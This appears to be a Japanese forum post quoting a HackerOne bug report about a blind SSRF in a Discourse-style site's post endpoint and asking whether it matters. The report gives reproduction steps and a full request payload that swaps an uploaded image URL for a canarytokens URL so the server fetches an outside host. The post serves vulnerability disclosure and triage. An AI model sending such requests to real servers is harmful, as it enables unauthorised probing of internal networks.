Hackeroneから以下の問題について報告を受けました。
疑問点は以下の通りです。
- これは問題ですか?
- 何か提案や対処法はありますか?
要約:
こんにちは、
hxxps://xyz.com/postsエンドポイントでブラインドSSRFを見つけました。再現手順:
- xyz.com でアカウントにログインします。
- プライベートメッセージに移動します(discobotからの挨拶メッセージがあります)。
- メッセージを送信する際に、画像をアップロードし、Burpでリクエストを傍受します。
- ペイロードで、画像のアップロードURLをカナリアURLに変更します。
- ペイロードは以下のようになります。
raw=![svg_image|690x388]>(hxxp://canarytokens.com/tags/images/terms/ctw75qckq1htf6n3rt9asrpn3/submit.aspx) &unlist_topic=false&category=&topic_id=1659497&is_warning=false&whisper=false&archetype=regular&composer_open_duration_msecs=12597&featured_link=&shared_draft=false&draft_key=topic_1659497&reply_to_post_number=83&image_sizes[hxxps://xyz.cloudfront.net/uploads/default/original/4X/c/a/9/ca90daba5408ce8b8693f3a5d58e537eb750e906.svg][width]=5120&image_sizes[hxxps://xyz.cloudfront.net/uploads/default/original/4X/c/a/9/ca90daba5408ce8b8693f3a5d58e537eb750e906.svg][height]=2880&nested_post=true
- リクエストを送信すると、2つのカナリアアラートがトリガーされるか、サーバーログを確認すると、Rubyユーザーエージェントからのリクエストと、Amazon Compute Instanceからのリクエストが1件ずつあります。
影響:
この脆弱性により、攻撃者はxyz.comインスタンスのネットワーク内で任意のHTTP/HTTPSリクエストを行うことができます。
このスレッドから、これはoneboxの動作によるものと思われます。https://meta.discourse.org/t/server-side-request-forgery-vulnerability/186996。
また、数年前のこのHackeroneレポートも見ました。SSRF in upload IMG through URL。
ありがとうございます!